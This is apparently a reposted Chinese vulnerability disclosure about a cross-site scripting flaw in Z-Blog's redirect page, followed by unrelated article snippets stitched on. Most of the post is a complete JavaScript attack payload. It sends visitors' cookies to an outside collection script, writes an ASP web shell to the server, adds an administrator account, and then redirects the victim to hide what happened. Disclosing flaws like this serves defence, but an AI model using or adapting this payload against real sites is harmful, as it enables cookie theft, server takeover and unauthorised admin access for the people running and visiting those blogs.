时间:2021-05-23
漏洞说明:Z-Blog是一款基于Asp平台的Blog博客(网志)程序,支持 Wap,支持Firefox,Oprea等浏览器,在国内使用非常广泛,官方主页在http:///function/c_urlredirect.asp?url=jxaxvxaxsxcxrxixpxtx:x"x>xxx]http://[/URL]
用户看到的是http://这个信任的站点,而一旦点击将在域执行恶意用户指定的js,在该js里可以 写shell,添加用户,偷取COOKIE然后模拟出真正的转向,整个过程很难发现攻击的意图,80sec提供js如下:
xmlhttp=poster();
cookie=document.cookie;
login=cookie.indexOf('password')==-1?0:1;
tolocation='http:///';
//get cookie
x=new Image();
x.src="http:///c.php?c=" escape(document.cookie);
//get a shell
data="txaContent=<%execute(request("a"))%>“;
postmydata(”http:///cmd.asp?act=SiteFilePst&path=./UPLOAD/index.asp&opath=”,data);
//add a user data=”edtID=0&edtLevel=2&edtName=xss2root&edtPassWord=d073d5454ffe92bdcd3cbcb77d149df5&edtPassWordRe=xss2root&edtEmail=null@null.com&edtHomePage=&edtAlias=”;
postmydata(”http:///cmd.asp?act=UserCrt”,data);
//fool the user
window.location=tolocation;
function poster(){
var request = false;
if(window.XMLHttpRequest) {
request = new XMLHttpRequest();
if(request.overrideMimeType) {
request.overrideMimeType(’text/xml’);
}
} else if(window.ActiveXObject) {
var versions = ['Microsoft.XMLHTTP', 'MSXML.XMLHTTP', 'Microsoft.XMLHTTP', 'Msxml2.XMLHTTP.7.0', 'Msxml2.XMLHTTP.6.0', 'Msxml2.XMLHTTP.5.0', 'Msxml2.XMLHTTP.4.0', 'MSXML2.XMLHTTP.3.0', 'MSXML2.XMLHTTP'];
for(var i=0; i
try {
request = new ActiveXObject(versions[i]);
} catch(e) {}
}
}
return request;
}
function postmydata(action,data){
xmlhttp.open(”POST”, action, false);
xmlhttp.setRequestHeader(’Content-Type’, ‘application/x-www-form-urlencoded’);
xmlhttp.send(data);
return xmlhttp.responseText;
}
漏洞状态:已经联系官方,请等待官方公告。
本站内容均为原创,转载请务必保留署名与链接!
Z-blog跨站脚本攻击漏洞:http:///zbog-xss.html
声明:本页内容来源网络,仅供用户参考;我单位不保证亦不表示资料全面及准确无误,也不保证亦不表示这些资料为最新信息,如因任何原因,本网内容或者用户因倚赖本网内容造成任何损失或损害,我单位将不会负任何法律责任。如涉及版权问题,请提交至online#300.cn邮箱联系删除。
XSS跨站攻击及防护措施。XSS跨站攻击也称为跨站脚本攻击,它是网站程序中一种较为常见的漏洞,其主要是通过在web中插入相关的代码,当网页被访问时,其中的代码则
很多朋友都说,z-blog进后台不显示验证码?这种情况在用z-blog程序的时候也遇到过,下面就讲讲解决Z-BLOG后台验证码不显示这个问题的详细过程。 记得
制作Z-Blog的样式,首先要对Z-Blog的页面元素、布局要有了解,再配合CSS、图像处理等技术,就可以制作了。Z-Blog采用了页面表现、样式与内容分离的技
但是一些Z-Blog用户对于此项配置还不是很了解,Z-Blog官方也没有比较详细的指导或说明。所以我写这篇文章希望对某些Z-Blog用户有所帮助。1、生成分类静
CSRF攻击。CSRF通过伪装来自受信任用户的请求来利用受信任的网站进行攻击,此类攻击在BLOG,SNS等大型社区类网站的脚本蠕虫中频繁使用。通过跨站脚本蠕虫反